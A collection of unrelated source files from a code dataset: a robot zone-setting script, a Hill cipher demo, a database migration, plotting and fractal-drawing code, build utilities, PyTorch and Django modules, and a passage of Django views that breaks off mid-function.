    """ Loads a file content """
    # Always read bytes; decode only when a text result was requested.
    with open(path, 'rb') as handle:
        raw = handle.read()
    if binary:
        return raw
    return raw.decode()
|
984,616 | cce36395a93b470ffb36c6bf0944e44e3282d927 | #!/usr/bin/env python3
"""
HOW TO USE THIS SCRIPT:
put this as an .autorun file in the root of the USB stick,
along with a file named zone-<X> where <X> is the id of the zone (0 to 3) to use.
(The file can be blank and should have no extension)
"""
import socket
import json
import time
from enum import Enum
from threading import Event
# A single SOCK_SEQPACKET unix socket, shared by every poll() call/retry.
sock = socket.socket(socket.AF_UNIX, socket.SOCK_SEQPACKET)

class State(Enum):
    """Phases of the poll() state machine."""
    CONNECT = 1  # (re)connect the unix socket
    MESSAGE = 2  # send the zone/mode message and await acknowledgement
    DONE = 3     # zone confirmed; idle a second, then re-confirm
def poll(robot_root_path, zone_id, stop_event: Event = None):
    """Repeatedly tell robotd which zone/mode to use until acknowledged.

    Connects to <robot_root_path>game/state, sends a competition-mode
    message for zone_id, and after acknowledgement re-sends every second.
    Runs until stop_event is set (by default it never is).
    """
    # Bug fix: the old default (stop_event=Event()) was a mutable default
    # evaluated once at import and shared by all calls; create a fresh
    # Event per call instead.
    if stop_event is None:
        stop_event = Event()
    message = '{{"zone":{}, "mode":"competition"}}\n'.format(zone_id).encode('utf-8')
    state = State.CONNECT
    while not stop_event.is_set():
        try:
            if state is State.CONNECT:
                sock.connect(robot_root_path+"game/state")
                state = State.MESSAGE
            if state is State.MESSAGE:
                sock.send(message)
                resp = sock.recv(2048)
                resp = json.loads(resp.decode('utf-8'))
                # robotd echoes the zone back once it has been applied.
                if 'zone' in resp and resp['zone'] == zone_id:
                    print("done")
                    state = State.DONE
                else:
                    state = State.MESSAGE
            if state is State.DONE:
                time.sleep(1)
                state = State.MESSAGE
        except (ConnectionRefusedError, OSError):
            # robotd not up yet (or socket hiccup): back off and reconnect.
            time.sleep(0.1)
            print("cant connect")
            state = State.CONNECT
if __name__ == "__main__":
    import os
    import glob
    import re
    from pathlib import Path

    # The zone id is encoded in a marker file named zone-<N> that sits next
    # to this script on the USB stick.
    path = Path(os.path.dirname(os.path.realpath(__file__)))
    # Get all files named zone-1, zone-2, etc..
    id_files = glob.glob(str(path / "zone-*"))
    if not id_files:
        print("Could not find any zone ids (files like zone-1 or zone-0)")
        exit(0)
    id_file = id_files[0]
    if len(id_files) > 1:
        print("Warning, found more than 1 zone file!")
    # Get the first number in the filename
    zone_id = int(re.search(r'\d', id_file).group(0))
    print("ID:", zone_id)
    # Blocks forever: keeps (re)asserting the zone until the process dies.
    poll("/var/robotd/", zone_id)
984,617 | 41aa4c794eff96c2290a47756ce3a9a56d7728b5 | # Hill cipher! Works with any key matrix size, any modulus
from hill import *

# wiki expamples
# key = 'GYBNQKURP'
# msg = 'ACT'

# 3x3 key over the classic mod-26 alphabet; encrypt, then round-trip decrypt.
key = [[6, 24, 1], [13, 16, 10], [20, 17, 15]]
msg = [0, 2, 19]
cipher = Hill(key, mod=26)
enc = cipher.encrypt(msg)
print(enc)
dec = cipher.decrypt(enc)
print(dec)

# 2x2 key over a prime modulus (257); message longer than one block.
key = [[3, 3], [2, 5]]
msg = [7, 4, 11, 15]
cipher = Hill(key, mod=257)
enc = cipher.encrypt(msg)
print(enc)
dec = cipher.decrypt(enc)
print(dec)
984,618 | 789edd11d7eaeea757dc7d3c289ec8c4aab53f8c | """add whitelist table
Revision ID: b1d666d55f79
Revises: 71fa00181562
Create Date: 2021-02-21 00:41:21.425630
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'b1d666d55f79'
down_revision = '71fa00181562'
branch_labels = None
depends_on = None
def upgrade():
    """Create the whitelist join table (driver <-> passenger)."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('whitelist',
    sa.Column('driver_id', sa.Text(), nullable=False),
    sa.Column('passenger_id', sa.Text(), nullable=False),
    # Rows disappear automatically when either referenced side is deleted.
    sa.ForeignKeyConstraint(['driver_id'], ['driver.id'], ondelete='CASCADE'),
    sa.ForeignKeyConstraint(['passenger_id'], ['passenger.id'], ondelete='CASCADE')
    )
    # ### end Alembic commands ###
def downgrade():
    """Drop the whitelist table (reverses upgrade())."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_table('whitelist')
    # ### end Alembic commands ###
|
984,619 | ac782d67e4bfe8ea19ad65178c87f00005bdee41 | #!/usr/bin/env python
#coding=utf-8
from pylab import *
from configobj import ConfigObj
import matplotlib.pyplot as plt
def display2Dpointset(A):
    """Plot one 2D point set, labelling each point with its 1-based index."""
    fig = plt.figure()
    ax = fig.add_subplot(111)
    #ax.grid(True)
    ax.plot(A[:,0],A[:,1],'yo',markersize=8,mew=1)
    labels = plt.getp(plt.gca(), 'xticklabels')
    plt.setp(labels, color='k', fontweight='bold')
    labels = plt.getp(plt.gca(), 'yticklabels')
    plt.setp(labels, color='k', fontweight='bold')
    for i,x in enumerate(A):
        # Annotate with the 1-based point number at the point's location.
        ax.annotate('%d'%(i+1), xy = x, xytext = x + 0)
    ax.set_axis_off()
    #fig.show()
def display2Dpointsets(A, B, ax = None):
    """ display a pair of 2D point sets """
    # A is drawn as yellow circles, B as blue crosses; a new figure/axes is
    # created only when none is supplied.
    if not ax:
        fig = plt.figure()
        ax = fig.add_subplot(111)
    ax.plot(A[:,0],A[:,1],'yo',markersize=8,mew=1)
    ax.plot(B[:,0],B[:,1],'b+',markersize=8,mew=1)
    #pylab.setp(pylab.gca(), 'xlim', [-0.15,0.6])
    labels = plt.getp(plt.gca(), 'xticklabels')
    plt.setp(labels, color='k', fontweight='bold')
    labels = plt.getp(plt.gca(), 'yticklabels')
    plt.setp(labels, color='k', fontweight='bold')
def display3Dpointsets(A,B,ax):
    """Scatter two 3D point sets on *ax*: A as yellow circles, B as blue crosses."""
    #ax.plot3d(A[:,0],A[:,1],A[:,2],'yo',markersize=10,mew=1)
    #ax.plot3d(B[:,0],B[:,1],B[:,2],'b+',markersize=10,mew=1)
    ax.scatter(A[:,0],A[:,1],A[:,2], c = 'y', marker = 'o')
    ax.scatter(B[:,0],B[:,1],B[:,2], c = 'b', marker = '+')
    ax.set_xlabel('X')
    ax.set_ylabel('Y')
    ax.set_zlabel('Z')
from mpl_toolkits.mplot3d import Axes3D
def displayABC(A,B,C):
    """Show model A vs scene B (left) and transformed model C vs B (right).

    Dispatches on point dimensionality; assumes A.shape[1] is 2 or 3 -
    any other dimension silently draws an empty figure (TODO confirm).
    """
    fig = plt.figure()
    dim = A.shape[1]
    if dim==2:
        ax = plt.subplot(121)
        display2Dpointsets(A, B, ax)
        ax = plt.subplot(122)
        display2Dpointsets(C, B, ax)
    if dim==3:
        plot1 = plt.subplot(1,2,1)
        ax = Axes3D(fig, rect = plot1.get_position())
        display3Dpointsets(A,B,ax)
        plot2 = plt.subplot(1,2,2)
        ax = Axes3D(fig, rect = plot2.get_position())
        display3Dpointsets(C,B,ax)
    plt.show()
def display_pts(f_config):
    """Load the model/scene/transformed point files named in an INI config
    (section [FILES]) and display them side by side via displayABC.
    """
    config = ConfigObj(f_config)
    file_section = config['FILES']
    # plain-text coordinate files, one point per row
    mf = file_section['model']
    sf = file_section['scene']
    tf = file_section['transformed_model']
    m = np.loadtxt(mf)
    s = np.loadtxt(sf)
    t = np.loadtxt(tf)
    displayABC(m,s,t)
|
def armstrong_numbers(lower=100, upper=1000):
    """Return the three-digit Armstrong (narcissistic) numbers in [lower, upper).

    An Armstrong number equals the sum of the cubes of its decimal digits.
    The original relied on Python 2's integer ``/`` and ``print`` statement;
    explicit ``//`` and a function make it run identically on Python 2 and 3.
    """
    found = []
    for i in range(lower, upper):
        a = i // 100          # hundreds digit
        b = (i % 100) // 10   # tens digit
        c = i % 10            # units digit
        if a**3 + b**3 + c**3 == i:
            found.append(i)
    return found


for n in armstrong_numbers():
    print(n)
|
984,621 | 0b8bebd88417d46b03553d2a06f40201dd3c1293 |
from django.db import models
class NewsQueryset(models.QuerySet):
    """Queryset with news-filtering helpers; every method is still a stub."""
    def news_for_week(self):
        """All news from website for week."""
        raise NotImplementedError
    def news_for_month(self):
        """All news from website for month."""
        raise NotImplementedError
    def news_about_snippets(self):
        """All news that mention snippets (stub)."""
        raise NotImplementedError
|
984,622 | 993ffda4ac667d4c4e76b87b70eea290b7b73879 | """misc build utility functions"""
# Copyright (c) PyZMQ Developers
# Distributed under the terms of the Modified BSD License.
import copy
import logging
import os
import sys
from pprint import pprint
from shlex import quote
from subprocess import PIPE, Popen
from .msg import warn
pjoin = os.path.join
def customize_mingw(cc):
    """Scrub problematic flags/libraries from a mingw32 compiler instance."""
    # strip -mno-cygwin from mingw32 (Python Issue #12641)
    commands = (
        cc.compiler,
        cc.compiler_cxx,
        cc.compiler_so,
        cc.linker_exe,
        cc.linker_so,
    )
    for command in commands:
        if '-mno-cygwin' in command:
            command.remove('-mno-cygwin')
    # remove problematic msvcr90
    if 'msvcr90' in cc.dll_libraries:
        cc.dll_libraries.remove('msvcr90')
def get_compiler(compiler, **compiler_attrs):
    """Return a deep copy of *compiler* with the given attributes overridden."""
    customized = copy.deepcopy(compiler)
    for attr, value in compiler_attrs.items():
        setattr(customized, attr, value)
    return customized
def get_output_error(cmd, **kwargs):
    """Return the exit status, stdout, stderr of a command as text."""
    if not isinstance(cmd, list):
        cmd = [cmd]
    logging.debug("Running: %s", ' '.join(map(quote, cmd)))
    try:
        proc = Popen(cmd, stdout=PIPE, stderr=PIPE, **kwargs)
    except OSError as e:
        # command could not even be started
        return -1, '', f'Failed to run {cmd!r}: {e!r}'
    out, err = proc.communicate()
    # decode with replacement so undecodable bytes never raise
    out = out.decode('utf8', 'replace')
    err = err.decode('utf8', 'replace')
    return proc.returncode, out, err
def locate_vcredist_dir(plat):
    """Locate vcredist directory and add it to $PATH
    Adding it to $PATH is required to run
    executables that link libzmq to find e.g. msvcp140.dll

    Windows-only. Returns the redist directory, or None when the vcvars
    environment does not expose py_vcruntime_redist.
    """
    # NOTE(review): setuptools.msvc is deprecated/removed in newer
    # setuptools releases - confirm the pinned setuptools still ships it.
    from setuptools import msvc

    vcvars = msvc.msvc14_get_vc_env(plat)
    try:
        vcruntime = vcvars["py_vcruntime_redist"]
    except KeyError:
        warn(f"platform={plat}, vcvars=")
        pprint(vcvars, stream=sys.stderr)
        warn(
            "Failed to get py_vcruntime_redist via vcvars, may need to set it in %PATH%"
        )
        return None
    redist_dir, dll = os.path.split(vcruntime)
    # add redist dir to $PATH so that it can be found
    os.environ["PATH"] += os.pathsep + redist_dir
    return redist_dir
|
984,623 | 562205f6e653a044a030b192ee6d92e74cd37a88 | from torch.utils import data
from torchvision import transforms as T
from torchvision.datasets import ImageFolder
from PIL import Image
import torch
import os
import random
import pdb
class ImageFolder(data.Dataset):
    """Dataset of (source, target) image pairs.

    Filenames are expected to look like ``<char>_<style>.jpg``; for each
    source image a target with the same style but a different character is
    drawn at random (TODO confirm naming convention against the data).
    """

    def __init__(self, image_dir, transform, mode):
        """Index every image file found under ``image_dir + mode``."""
        self.image_dir = image_dir
        self.train_images = list(map(lambda x: os.path.join(image_dir+mode, x), os.listdir(image_dir+mode)))
        self.transform = transform
        self.num_images = len(self.train_images)
        self.mode = mode

    def __getitem__(self, index):
        """Return (src, src_style, src_char, trg, trg_style, trg_char)."""
        src = self.train_images[index]
        # parse "<char>_<style>.jpg" out of the path
        src_char = int(src.split('_')[0][len(self.image_dir+self.mode+'/'):])
        src_style = int(src.split('_')[1][:-len(".jpg")])
        try:
            # same style, different character; random.choice raises
            # IndexError when no candidate exists
            trg = random.choice([x for x in self.train_images
                                 if '_'+str(src_style) in x and str(src_char)+'_' not in x])
        except IndexError:
            # no alternative character available - fall back to the source
            trg = src
        trg_style = int(trg.split('_')[1][:-len(".jpg")])
        trg_char = int(trg.split('_')[0][len(self.image_dir+self.mode+'/'):])
        src = self.transform(Image.open(src))
        trg = self.transform(Image.open(trg))
        return src, src_style, src_char, \
               trg, trg_style, trg_char

    def __len__(self):
        """Return the number of images."""
        return self.num_images
class ImageFolder1(data.Dataset):
    """Dataset where each entry is a sub-folder of images, returned as a
    single tensor concatenated along dim 0."""
    def __init__(self, image_dir, transform,mode):
        """Index every sub-folder found under ``image_dir + mode``."""
        self.image_dir = image_dir
        self.train_imagefs = list(map(lambda x: os.path.join(image_dir+mode, x), os.listdir(image_dir+mode)))
        self.transform = transform
        self.num_images = len(self.train_imagefs)
        self.mode=mode
    def __getitem__(self, index):
        """Return all images of one folder stacked into one tensor."""
        # NOTE(review): reshuffling the folder list on every fetch makes
        # `index` effectively random in train mode - confirm intended.
        if self.mode=='train':
            random.seed()
            random.shuffle(self.train_imagefs)
        #print(index)
        fo = self.train_imagefs[index]
        imgs=os.listdir(fo)
        x=[]
        for item in imgs:
            x.append(self.transform(Image.open(fo+'/'+item)))
        x=torch.cat(x, dim=0)
        return x
    def __len__(self):
        """Return the number of images."""
        return self.num_images
def get_loader(m,image_dir, attr_path, selected_attrs, crop_size=178, image_size=128,
               batch_size=16, dataset='CelebA', mode='train', num_workers=1):
    """Build and return a data loader.

    ``m == 10`` selects the folder-of-folders dataset (ImageFolder1) for
    RaFD; shuffling is enabled only in train mode.
    """
    transform = []
    transform.append(T.ToTensor())
    #transform.append(T.Normalize(mean=[0.5], std=[0.5]))
    transform = T.Compose(transform)
    # NOTE(review): CelebA is not defined or imported in this module, so
    # the default dataset='CelebA' path raises NameError - confirm intended.
    if dataset == 'CelebA':
        dataset = CelebA(image_dir, attr_path, selected_attrs, transform, mode)
    elif dataset == 'RaFD':
        if m==10:
            dataset = ImageFolder1(image_dir, transform,mode)
        else:
            dataset = ImageFolder(image_dir, transform,mode)
    data_loader = data.DataLoader(dataset=dataset,
                                  batch_size=batch_size,
                                  shuffle=(mode=='train'),
                                  num_workers=num_workers)
    return data_loader
984,624 | b7ea4032aeb959124d3b9b7c724e5046a930d806 | from django.db import models
from tenant_schemas.models import TenantMixin
class Tenant(TenantMixin):
    # Human-readable tenant name.
    name = models.CharField(max_length=100)
    # Create the tenant's database schema automatically on save.
    auto_create_schema = True
# class Domain(DomainMixin):
# pass
|
984,625 | ddddc929e7993fb8f87d581cef2961f322b39cb5 | from .csmnet import CSMNet
__all__ = [
"CSMNet"
] |
984,626 | 32e4a2e74beead088e26dd373f42a30e68107645 | # @abrightmoore
# from numpy import *
from math import sqrt, tan, sin, cos, pi, ceil, floor, acos, atan, asin, degrees, radians, log, atan2
import os
import time
from random import randint, random, Random
import io
from io import BytesIO
import sys
from numpy import *
from PIL import Image, ImageDraw
from ImageTools import *
from Gen_Trigonometry import calcFormula
from Colours import *
def draw(img):
    """Render one randomly chosen popcorn-fractal variant onto *img*."""
    roll = random()
    if roll < 0.3:
        popcorn1(img)
    elif roll < 1.0:
        popcorn2(img)
    else:
        # colour variant, still under test; random() < 1.0 always holds,
        # so this branch is currently unreachable by construction
        popcorn3(img)
def popcorn3(img): # http://paulbourke.net/fractals/popcorn/popcorn.c
    # Colour variant: accumulate orbit hits into an offscreen image, then map
    # the hit counts through a Brownian colour ramp onto the target image.
    width = img.size[0]
    height = img.size[1]
    img2 = Image.new("RGBA",size=(width,height),color=(0,0,0))
    scale = 1000 #random() * 20+0.01
    hconst = 0.5 #0.01 * randint(1,5)
    #scale = width
    N = 1000
    M = 0.1 #randint(5,20)
    C = getColoursBrownian(randint(32,128),randint(4,16))
    # C = getRandomAnalogousColours()
    print C
    pix = img2.load()
    i = 0
    while i < width:
        j = 0
        while j < height:
            # map pixel (i, j) into fractal space centred on the image
            x = float(2.0 * scale * (float(i) - float(width) / 2.0) / float(width))
            y = float(2.0 * scale * (float(j) - float(height) / 2.0) / float(height))
            for n in xrange(0,N):
                # popcorn iteration: offset by sin/tan of the other axis
                xnew = float(x - hconst * sin(y + tan(3 * y)))
                ynew = float(y - hconst * sin(x + tan(3 * x)))
                ix = 0.5 * xnew * float(width) / scale + float(width) / 2.0;
                iy = 0.5 * ynew * float(height) / scale + float(height) / 2.0;
                if (ix >= 0 and iy >= 0 and ix < width and iy < height):
                    # NOTE(review): img2 is RGBA, so pix[..] should yield a
                    # 4-tuple; this 3-way unpack looks like it would raise -
                    # confirm against the PIL version in use.
                    (vr,vg,vb) = pix[ix,iy]
                    # bump the per-channel hit counter
                    colour = ((vr+1)%255,(vg+1)%255,(vb+1)%255,255)
                    pix[ix,iy] = colour
                x = xnew
                y = ynew
            j = j+M
        i = i +M
    px = img.load()
    max = 0
    min = 255
    # recolour the destination image from the red-channel hit counts
    for x in xrange(0,width):
        for y in xrange(0,height):
            (vr,vg,vb) = pix[x,y]
            (r,g,b) = C[vr%len(C)]
            px[x,y] = (r,g,b,255)
            if vr > max:
                max = vr
            if vr < min:
                min = vr
    print min,max
    img2.save("imagesTest\\testonly_"+str(randint(1000000,9999999))+".png")
def popcorn2(img): # http://paulbourke.net/fractals/popcorn/popcorn.c
    # Brighten-by-16 variant: each orbit hit bumps the pixel's RGB channels.
    width = img.size[0]
    height = img.size[1]
    scale = random() * 20
    hconst = 0.001 * randint(1,60)
    #scale = width
    N = randint(400,1000)
    M = randint(5,20)
    pix = img.load()
    i = 0
    while i < width:
        j = 0
        while j < height:
            # map pixel (i, j) into fractal space centred on the image
            x = float(2.0 * scale * (i - width / 2) / width)
            y = float(2.0 * scale * (j - height / 2) / height)
            for n in xrange(0,N):
                xnew = float(x - hconst * sin(y + tan(3 * y)))
                ynew = float(y - hconst * sin(x + tan(3 * x)))
                ix = 0.5 * xnew * width / scale + width / 2;
                iy = 0.5 * ynew * height / scale + height / 2;
                if (ix >= 0 and iy >= 0 and ix < width and iy < height):
                    (vr,vg,vb,va) = pix[ix,iy]
                    # brighten the hit pixel, wrapping at 255; alpha unchanged
                    colour = ((vr+16)%255,(vg+16)%255,(vb+16)%255,va)
                    pix[ix,iy] = colour
                x = xnew
                y = ynew
            j = j+M
        i = i +M
def popcorn1(img): # http://paulbourke.net/fractals/popcorn/popcorn.c
    """Draw a greyscale popcorn fractal onto *img* (a PIL RGBA image).

    Each traced orbit point is shaded by its iteration depth ``n``.
    """
    width = img.size[0]
    height = img.size[1]
    scale = random() * 20
    hconst = 0.001 * randint(1,60)
    #scale = width
    N = randint(400,1000)
    M = randint(5,20)
    pix = img.load()
    i = 0
    while i < width:
        j = 0
        while j < height:
            # map pixel (i, j) into fractal space centred on the image
            x = float(2.0 * scale * (i - width / 2) / width)
            y = float(2.0 * scale * (j - height / 2) / height)
            for n in xrange(0,N):
                xnew = float(x - hconst * sin(y + tan(3 * y)))
                ynew = float(y - hconst * sin(x + tan(3 * x)))
                # Shade by iteration depth.  The original computed
                # n/N*255, which under Python 2 integer division is 0 for
                # every n < N, so all plotted pixels came out black.
                shade = n * 255 // N
                colour = (shade, shade, shade, 255)
                ix = 0.5 * xnew * width / scale + width / 2
                iy = 0.5 * ynew * height / scale + height / 2
                if (ix >= 0 and iy >= 0 and ix < width and iy < height):
                    pix[ix,iy] = colour
                x = xnew
                y = ynew
            j = j+M
        i = i +M
def popcornH(img,hconst): # http://paulbourke.net/fractals/popcorn/popcorn.c
    # Like popcorn1/2 but with a caller-supplied h constant; hit counts are
    # packed into the 24-bit RGB value of each pixel.
    width = img.size[0]
    height = img.size[1]
    scale = 10 #random() * 20
    # hconst = 0.001 * randint(1,60)
    #scale = width
    N = 1000 #randint(400,1000)
    M = 0.1 #randint(5,20)
    max = 0  # NOTE(review): shadows the builtin and is never read after the loop
    pix = img.load()
    i = float(0)
    while i < width:
        j = float(0)
        while j < height:
            x = float(2.0 * scale * (i - width / 2) / width)
            y = float(2.0 * scale * (j - height / 2) / height)
            for n in xrange(0,N):
                xnew = float(x - hconst * sin(y + tan(3 * y)))
                ynew = float(y - hconst * sin(x + tan(3 * x)))
                colour = (n/N*255,n/N*255,n/N*255,255)  # NOTE(review): unused, and n/N is 0 under py2
                ix = 0.5 * xnew * width / scale + width / 2;
                iy = 0.5 * ynew * height / scale + height / 2;
                if (ix >= 0 and iy >= 0 and ix < width and iy < height):
                    (r,g,b,a) = pix[ix,iy]
                    # treat the pixel's RGB bytes as a single 24-bit counter
                    v = (r<<16)+(g<<8)+b
                    v = v+1
                    if v == 0:
                        v = 128
                    if v > max:
                        max = v
                    pix[ix,iy] = ((v&0xff0000)>>16,(v&0xff00)>>8,(v&0xff),255)
                    # print pix[ix,iy]
                x = xnew
                y = ynew
            j = M+j
        i = M+i
def stubby():
    # Re-render image in colours
    # NOTE(review): dead/broken helper - it references width, height, pix and
    # max that are not defined in this scope, and the bare `exit` below is a
    # no-op expression (probably meant `break`).  Kept verbatim for reference.
    print "Painting pixels..."
    # each ramp entry is (position in [0,1], r, g, b)
    coloursArray = [[(0.0,0,7,100),(0.16,32,107,203),(0.42,237,255,255),(0.6425,255,170,0),(0.8575,0,2,0),(1.0,30,0,0)], # after NightElfik
        [(0.0,0,randint(10,100),randint(10,100)),(0.16,randint(10,100),randint(10,107),randint(10,203)),(0.42,randint(10,235),randint(10,255),randint(10,255)),(0.6425,randint(10,255),randint(10,170),0),(0.8575,0,2,0),(1.0,30,0,0)],
        [(0.0,0,randint(128,255),randint(128,255)),(0.16,randint(128,255),randint(128,255),randint(128,256)),(0.42,randint(128,255),randint(128,255),randint(128,255)),(0.6425,randint(128,255),randint(128,255),0),(0.8575,0,2,0),(1.0,30,0,0)],
        ]
    colours = coloursArray[0] #randint(0,len(coloursArray)-1)]
    print "Max "+str(max)
    for x in xrange(0,width):
        for y in xrange(0,height):
            (r,g,b,a) = pix[x,y]
            count = (r<<16)+(g<<8)+b
            #remap to colour
            posn = float(count)/float(max)
            (p1, r1, g1, b1) = colours[0]
            # linear interpolation between the two ramp stops bracketing posn
            for (p2, r2, g2, b2) in colours:
                if p1 <= posn and posn < p2:
                    posnDelta = posn - p1
                    gap = p2 - p1
                    colPos = posnDelta/gap
                    pix[x,y] = (int(r1+colPos*(r2-r1))%256,
                        int(g1+colPos*(g2-g1))%256,
                        int(b1+colPos*(b2-b1))%256,255)
                    exit
                (p1, r1, g1, b1) = (p2, r2, g2, b2)
984,627 | b05b5b47e218579a8ae7a7484c5eef24c89bc3a3 | #!/usr/bin/env python3
import sys
# Read three integers, sort them ascending, and label them A < B < C.
numbers = sorted(int(token) for token in sys.stdin.readline().split(' '))
d = dict(zip('ABC', numbers))
# Echo the values for the requested permutation of the letters A/B/C.
print(' '.join(str(d[letter]) for letter in sys.stdin.readline().rstrip()))
|
984,628 | e0df592a5d07c3a574990368c83349ea83534d30 | import json, urllib.request
from socket import error as SocketError
import errno
import datetime
# Retrieve JSON data from within the API
# Build today's date (the single-element list mirrors the original structure).
mylist = []
today = datetime.date.today()
mylist.append(today)
currentDate = mylist[0]
url = "http://empisapi.accline.com/api/attendance/getattendancesbydate?date={}&deptId=0&desigId=0".format(currentDate)
try:
    response = urllib.request.urlopen(url)
    json_data = json.loads(response.read())
    result = json_data.get("Result")
except SocketError as e:
    if e.errno != errno.ECONNRESET:
        raise # Not error we are looking for
    print("Internet Not Connected") ## Handle error here.
    # NOTE(review): on ECONNRESET we fall through with `result` undefined,
    # so the comprehension below raises NameError - confirm intended handling.
fields = [
    # 'PID',
    'pid',
    'pname',
    'desig',
    'dept',
    'lts_i',
    'lts_O',
    # 'P_Status'
    'p_status'
]
# One row per attendance record, with columns in `fields` order.
# NOTE(review): assumes "Result" is a list of dicts keyed by these field
# names - verify against the API contract.
my_data = [list(item[field] for field in fields) for item in result]
|
984,629 | 5e66dbd36ae6e73c64012ac09d964db2e822afbd |
A = [[1, 2, 3],
     [4, 5, 6],
     [7, 8, 9]]

B = [[5, 8, 1, 2],
     [1, 2, 6, 8],
     [4, 5, 9, 1]]


def matmul(X, Y):
    """Return the matrix product X @ Y as nested lists.

    The result shape is derived from the operands instead of being
    hard-coded, so any compatible (n x m) * (m x p) pair works.

    Raises ValueError when the inner dimensions do not match.
    """
    if X and Y and len(X[0]) != len(Y):
        raise ValueError("incompatible shapes for matrix multiplication")
    # zip(*Y) iterates the columns of Y
    return [[sum(x * y for x, y in zip(row, col)) for col in zip(*Y)]
            for row in X]


result = matmul(A, B)

for r in result:
    print(r)
|
984,630 | 082d4ae47d23d812f69f9640bc0747ce49770724 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (C) 2012 Yahoo! Inc. All Rights Reserved.
# Copyright (C) 2012 New Dream Network, LLC (DreamHost) All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Platform-specific logic for Ubunutu Oneiric components.
"""
import tempfile
import time
from devstack.components import db
from devstack import log as logging
from devstack import shell as sh
from devstack import utils
from devstack.packaging import apt
LOG = logging.getLogger(__name__)
class DBInstaller(db.DBInstaller):
    """MySQL installer tweaks for this distro."""

    def _configure_db_confs(self):
        """Rewrite /etc/mysql/my.cnf so mysql listens on all interfaces."""
        LOG.info("Fixing up %s mysql configs.", self.distro.name)
        contents = sh.load_file('/etc/mysql/my.cnf')
        adjusted = []
        for line in contents.splitlines():
            if line.startswith('bind-address'):
                line = 'bind-address = %s' % ('0.0.0.0')
            adjusted.append(line)
        # writing /etc requires root
        with sh.Rooted(True):
            sh.write_file('/etc/mysql/my.cnf', utils.joinlinesep(*adjusted))
class AptPackager(apt.AptPackager):
    """Apt packager with rabbitmq-server workarounds (LP#878597/878600)."""

    def _remove_special(self, name, info):
        """Remove then purge rabbitmq-server explicitly; True if handled."""
        if name == 'rabbitmq-server':
            #https://bugs.launchpad.net/ubuntu/+source/rabbitmq-server/+bug/878597
            #https://bugs.launchpad.net/ubuntu/+source/rabbitmq-server/+bug/878600
            LOG.debug("Handling special remove of %s." % (name))
            pkg_full = self._format_pkg_name(name, info.get("version"))
            cmd = apt.APT_REMOVE + [pkg_full]
            self._execute_apt(cmd)
            #probably useful to do this
            time.sleep(1)
            #purge
            cmd = apt.APT_PURGE + [pkg_full]
            self._execute_apt(cmd)
            return True
        return False

    def _install_special(self, name, info):
        """Install rabbitmq-server with output redirected to a temp file."""
        if name == 'rabbitmq-server':
            #https://bugs.launchpad.net/ubuntu/+source/rabbitmq-server/+bug/878597
            #https://bugs.launchpad.net/ubuntu/+source/rabbitmq-server/+bug/878600
            LOG.debug("Handling special install of %s." % (name))
            #this seems to be a temporary fix for that bug
            with tempfile.TemporaryFile() as f:
                pkg_full = self._format_pkg_name(name, info.get("version"))
                cmd = apt.APT_INSTALL + [pkg_full]
                self._execute_apt(cmd, stdout_fh=f, stderr_fh=f)
            return True
        return False
|
984,631 | c5f5668883747e3bda4da0f7d2608dd1862e9fd4 | from .models import *
from .forms import StopCreateForm
from django.shortcuts import render, redirect
from django.http import HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.contrib import messages
def stop(request, slug):
    """Render the detail page for a single Stop.

    Context carries the stop, its forum, and flags for whether the current
    user has joined the stop, belongs to its caravan, and voted in favor.
    """
    s = Stop.objects.filter(slug=slug).first()
    sf = StopForum.objects.filter(stop=s).first()
    joined = request.user in s.attendees.all()
    caravan_member = request.user in s.caravan.members.all()
    # .exists() avoids fetching rows just to count them
    is_interested = Vote.objects.filter(user=request.user, forum=sf, infavor=True).exists()
    context = {"s": s, "sf": sf, "joined": joined, 'caravan_member': caravan_member, 'is_interested': is_interested}
    return render(request, 'feed/stop.html', context)
@login_required
def my_stops(request):
    """List the user's stops grouped by caravan, ordered by start date."""
    # for s in Stop.objects.all():
    #     s.update_slug()
    my_stops = Stop.objects.filter(attendees=request.user).order_by('start_date')
    stops_by_caravan = {}
    my_caravans = set([s.caravan for s in my_stops])
    #my_caravans = request.user.caravan_set.all()
    for c in my_caravans:
        # NOTE(review): the queryset is wrapped in a single-element list -
        # verify the template expects [queryset] rather than the queryset.
        stops_by_caravan[c] = [my_stops.filter(caravan=c)]
    print(stops_by_caravan)  # NOTE(review): leftover debug output
    context = {'my_stops':my_stops, 'stops_by_caravan':stops_by_caravan}
    return render(request, 'feed/my_stops.html', context)
@login_required
def join_stop(request, slug):
    """Add the current user to a stop's attendee list (caravan members only)."""
    stop_obj = Stop.objects.filter(slug=slug).first()
    is_member = request.user in stop_obj.caravan.members.all()
    if is_member:
        stop_obj.attendees.add(request.user)
        print("Stop joined")
    else:
        print("ERROR: You must join this caravan first")
    return HttpResponseRedirect(f'/feed/stop/{stop_obj.slug}')
@login_required
def leave_stop(request, slug):
    """Remove the current user from the stop's attendee list."""
    stop_obj = Stop.objects.filter(slug=slug).first()
    stop_obj.attendees.remove(request.user)
    print("Stop removed")
    return HttpResponseRedirect(f'/feed/stop/{stop_obj.slug}')
@login_required
def add_stop(request, c_name=None):
    """Create a Stop via POST, or show the creation form on GET.

    *c_name* is the caravan name used for the post-create redirect.
    """
    context = {}
    if request.method == 'POST':
        s_form = StopCreateForm(request.POST)
        if s_form.is_valid():
            # status should be set to proposed and then auto-updated
            # need to create forum
            s = s_form.save()
            messages.success(request, f'Your Stop has been created.')
            # every stop gets a companion forum
            sf = StopForum.from_stop(s)
            sf.save()
            # NOTE(review): an invalid POST falls through and returns None
            # (no HttpResponse) - confirm intended handling.
            return redirect('caravan', c_name)
    else:
        # if c_name == None:
        #     sc_form = StopCaravanForm(instance=request.user)
        #     context = {'sc_form':sc_form}
        #     render(request, 'feed/add_stop_caravan.html', context)
        # elif len(Caravan.objects.filter(name=c_name).all()) == 1:
        #     s_form = StopCreateForm(instance=request.user)
        #     context = {'s_form':s_form, 'c_name': c_name}
